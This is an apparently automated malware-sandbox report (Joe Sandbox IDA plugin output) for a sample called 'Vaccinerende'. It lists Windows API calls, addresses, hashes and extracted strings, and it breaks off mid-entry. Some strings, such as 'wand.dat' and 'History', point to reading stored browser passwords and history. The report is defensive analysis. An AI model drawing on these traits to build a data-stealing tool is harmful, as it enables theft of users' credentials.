                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                            • String ID: \StringFileInfo\
                                            • API String ID: 102104167-2245444037
                                            • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                            • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                            APIs
                                            • GetSystemMetrics.USER32(00000000), ref: 00401990
                                            • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                            • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$PlacementWindow
                                            • String ID: AE
                                            • API String ID: 3548547718-685266089
                                            • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                            • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                            • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                            • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _memicmpwcslen
                                            • String ID: @@@@$History
                                            • API String ID: 1872909662-685208920
                                            • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                            • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                            APIs
                                            • memset.MSVCRT ref: 004100FB
                                            • memset.MSVCRT ref: 00410112
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 00410141
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                            • String ID: </%s>
                                            • API String ID: 3400436232-259020660
                                            • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                            • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                            APIs
                                            • memset.MSVCRT ref: 0040E770
                                            • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSendmemset
                                            • String ID: AE$"
                                            • API String ID: 568519121-1989281832
                                            • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                            • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                            APIs
                                            • memset.MSVCRT ref: 0040D58D
                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ChildEnumTextWindowWindowsmemset
                                            • String ID: caption
                                            • API String ID: 1523050162-4135340389
                                            • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                            • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                            APIs
                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                            • String ID: MS Sans Serif
                                            • API String ID: 210187428-168460110
                                            • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                            • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClassName_wcsicmpmemset
                                            • String ID: edit
                                            • API String ID: 2747424523-2167791130
                                            • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                            • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID: SHAutoComplete$shlwapi.dll
                                            • API String ID: 3150196962-1506664499
                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                            APIs
                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp
                                            • String ID:
                                            • API String ID: 3384217055-0
                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                            • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                            APIs
                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                            • GetMenu.USER32(?), ref: 00410F8D
                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                            • String ID:
                                            • API String ID: 1889144086-0
                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                            APIs
                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                            • GetLastError.KERNEL32 ref: 0041810A
                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                            • String ID:
                                            • API String ID: 1661045500-0
                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                            APIs
                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                            Strings
                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                            • API String ID: 1297977491-2063813899
                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                            APIs
                                            • memset.MSVCRT ref: 0040560C
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.*$dat$wand.dat
                                            • API String ID: 2618321458-1828844352
                                            • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                            • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                            • wcslen.MSVCRT ref: 00410C74
                                            • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                            • String ID:
                                            • API String ID: 1549203181-0
                                            • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                            • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                            APIs
                                            • memset.MSVCRT ref: 00412057
                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                            • String ID:
                                            • API String ID: 3550944819-0
                                            • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                            • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                            APIs
                                            • free.MSVCRT ref: 0040F561
                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$free
                                            • String ID: g4@
                                            • API String ID: 2888793982-2133833424
                                            • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                            • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
